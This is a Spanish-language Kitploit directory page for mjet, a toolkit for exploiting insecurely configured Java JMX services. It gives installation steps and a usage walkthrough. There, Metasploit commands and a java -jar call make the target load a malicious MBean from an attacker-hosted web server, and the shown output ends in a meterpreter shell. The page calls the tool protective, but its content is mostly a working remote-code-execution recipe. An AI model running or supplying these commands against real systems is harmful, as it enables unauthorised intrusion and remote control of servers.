Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
mjet — Kit de explotación de Mogwai Java Management Extensions (JMX) | Kitploit
Herramientas/GitHubGitHub/mogwaisec/mjet
Frameworks de ExploitsGeneración de PayloadsExplotaciónPruebas de PenetraciónMala ConfiguraciónRed Teaming
GitHubmogwaisec/mjet

mjet

Kit de explotación de Mogwai Java Management Extensions (JMX)

Ver Repositorio
17431hace 10 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

mjet

Mogwai Security Java Management Extensions (JMX) Exploitation Toolkit

mjet es una herramienta que puede utilizarse para proteger servicios JMX configurados de forma insegura. Se basa en el artículo "Exploiting JMX-RMI" de Braden Thomas/Accuvant "http://www.accuvant.com/blog/exploiting-jmx-rmi" y puede usarse para ejecutar payloads arbitrarios de Metasploit en el sistema objetivo.

Mjet fue originalmente planeado para ser un toolkit de ataque completo; sin embargo, notamos que el repositorio de Metasploit en Github contiene un pull request que proporcionará soporte básico para RMI/serialización de Java en ruby nativo. Esto es genial y elimina la dependencia de Java. Así que dejamos de desarrollar esta herramienta y crearemos módulos de Metasploit en el futuro cercano.

mjet consta de las siguientes partes:

  • Un módulo de Metasploit que emula un "mlet Server". Básicamente es un servidor web que aloja un archivo html que contiene una etiqueta mlet
  • Un ManagedBean que el módulo del servidor mlet modifica para incluir el payload seleccionado
  • Un archivo jar que se utiliza para contactar con el servicio JMX inseguro.

Installation (con la versión de github de Metasploit)

  • Copie la carpeta "MBean" en "data/java/metasploit"
  • Copie java_mlet_server.rb en "modules/exploits/multi/misc/"

Uso

El ejemplo usa los siguientes sistemas: atacante: 192.168.178.1 objetivo: 192.168.178.200, servicio JMX ejecutándose en el puerto tcp 1616

  • Configure/inicie el módulo de Metasploit "java_mlet_server". El módulo se ejecutará como un trabajo en segundo plano
root@kitploit:~
msf > use exploit/multi/misc/java_mlet_server
msf > set LHOST 192.168.178.1
msf > set SRVHOST 192.168.178.1
msf > set URIPATH /mlet/
msf > run

Use mjet.jar para conectarse al servicio JMX vulnerable y proporcione la URL al servidor web MLet...

root@kitploit:~
java -jar mjet.jar -t 192.168.178.200 -p 1616 -u http://192.168.178.1:8080/mlet/
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
---------------------------------------------------

[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.178.200:1616/jmxrmi ...
[+] Connected: rmi://192.168.178.164  5
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.178.1:8080/mlet/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE
[+] Invoking: metasploit.Metasploit.run()
[+] Done

y disfruta de tu shell de meterpreter :-)

Descargar herramienta